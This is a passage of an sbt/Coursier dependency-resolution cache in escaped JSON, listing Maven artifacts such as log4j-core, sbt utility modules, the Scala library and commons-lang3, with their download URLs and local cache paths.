:[[{\"name\":\"log4j-core\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.11.2/log4j-core-2.11.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.11.2/log4j-core-2.11.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-logging_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-logging_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-logging_2.12/1.3.3/util-logging_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-logging_2.12/1.3.3/util-logging_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"util-tracking_2.12\",\"revision\":\"1.3.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"util-tracking_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/util-tracking_2.12/1.3.3/util-tracking_2.12-1.3.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/util-tracking_2.12/1.3.3/util-tracking_2.12-1.3.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/util\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"sjson-new-murmurhash_2.12\",\"revision\":\"0.8.3\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sjson-new-murmurhash_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/com/eed3si9n/sjson-new-murmurhash_2.12/0.8.3/sjson-new-murmurhash_2.12-0.8.3.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/com/eed3si9n/sjson-new-murmurhash_2.12/0.8.3/sjson-new-murmurhash_2.12-0.8.3.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/eed3si9n/sjson-new\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"compiler-bridge_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"compiler-bridge_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/compiler-bridge_2.12/1.3.4/compiler-bridge_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/compiler-bridge_2.12/1.3.4/compiler-bridge_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"actions_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"actions_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/actions_2.12/1.3.8/actions_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/actions_2.12/1.3.8/actions_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"scripted-sbt-redux_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scripted-sbt-redux_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/scripted-sbt-redux_2.12/1.3.8/scripted-sbt-redux_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-sbt-redux_2.12/1.3.8/scripted-sbt-redux_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scalactic\",\"name\":\"scalactic_2.12\",\"revision\":\"3.0.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scalactic_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scalatest.org\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-utils\",\"revision\":\"3.0.22\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-utils\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://plexus.codehaus.org/plexus-utils\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-compile-core_2.12\",\"revision\":\"1.3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-compile-core_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-compile-core_2.12/1.3.4/zinc-compile-core_2.12-1.3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-compile-core_2.12/1.3.4/zinc-compile-core_2.12-1.3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/zinc\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"testing_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"testing_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/testing_2.12/1.3.8/testing_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/testing_2.12/1.3.8/testing_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"scripted-plugin_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scripted-plugin_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/scripted-plugin_2.12/1.3.8/scripted-plugin_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/scripted-plugin_2.12/1.3.8/scripted-plugin_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"sbt-assembly\",\"revision\":\"0.14.10\",\"configurations\":\"compile\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sbt-assembly\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar\",\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar\"]],\"missingArtifacts\":[],\"publicationDate\":\"2019-08-06T10:52:23+08:00\",\"evicted\":false,\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"configurations\":[{\"name\":\"pom\"},{\"name\":\"test\"},{\"name\":\"provided\"},{\"name\":\"docs\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"sources\"},{\"name\":\"runtime\"}],\"licenses\":[[\"MIT License\",\"https://github.com/sbt/sbt-assembly/blob/master/LICENSE\"]],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-library\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-library\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"template-resolver\",\"revision\":\"0.1\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"template-resolver\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/template-resolver/0.1/template-resolver-0.1.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/template-resolver/0.1/template-resolver-0.1.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/template-resolver\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"librarymanagement-ivy_2.12\",\"revision\":\"1.3.1\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"librarymanagement-ivy_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/librarymanagement-ivy_2.12/1.3.1/librarymanagement-ivy_2.12-1.3.1.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/librarymanagement-ivy_2.12/1.3.1/librarymanagement-ivy_2.12-1.3.1.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/librarymanagement\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-sbt\",\"name\":\"zinc-lm-integration_2.12\",\"revision\":\"1.3.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"zinc-lm-integration_2.12\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-sbt/zinc-lm-integration_2.12/1.3.8/zinc-lm-integration_2.12-1.3.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-sbt/zinc-lm-integration_2.12/1.3.8/zinc-lm-integration_2.12-1.3.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/sbt/sbt\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]}],\"details\":[]},{\"configuration\":{\"name\":\"scala-tool\"},\"modules\":[{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-compiler\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-compiler\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-compiler.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-library\",\"revision\":\"2.12.10\",\"configurations\":\"optional\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-library\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"jline\",\"name\":\"jline\",\"revision\":\"2.14.6\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jline\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/jline/jline/2.14.6/jline-2.14.6.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/jline/jline/2.14.6/jline-2.14.6.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-reflect\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-reflect\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.fusesource.jansi\",\"name\":\"jansi\",\"revision\":\"1.12\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jansi\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/fusesource/jansi/jansi/1.12/jansi-1.12.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/fusesource/jansi/jansi/1.12/jansi-1.12.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang.modules\",\"name\":\"scala-xml_2.12\",\"revision\":\"1.0.6\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-xml_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scala-lang/modules/scala-xml_2.12/1.0.6/scala-xml_2.12-1.0.6.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/modules/scala-xml_2.12/1.0.6/scala-xml_2.12-1.0.6.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scala-lang.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-compiler\",\"revision\":\"2.12.10\",\"configurations\":\"optional\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-compiler\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-compiler.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-library\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-library\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]}],\"details\":[]},{\"configuration\":{\"name\":\"sources\"},\"modules\":[],\"details\":[]},{\"configuration\":{\"name\":\"runtime\"},\"modules\":[{\"module\":{\"organization\":\"org.apache.commons\",\"name\":\"commons-lang3\",\"revision\":\"3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"org.apache.maven.wagon\",\"name\":\"wagon-provider-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"commons-lang3\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://commons.apache.org/proper/commons-lang/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-plugin-api\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-plugin-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-plugin-api/3.3.9/maven-plugin-api-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.ant\",\"name\":\"ant\",\"revision\":\"1.9.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"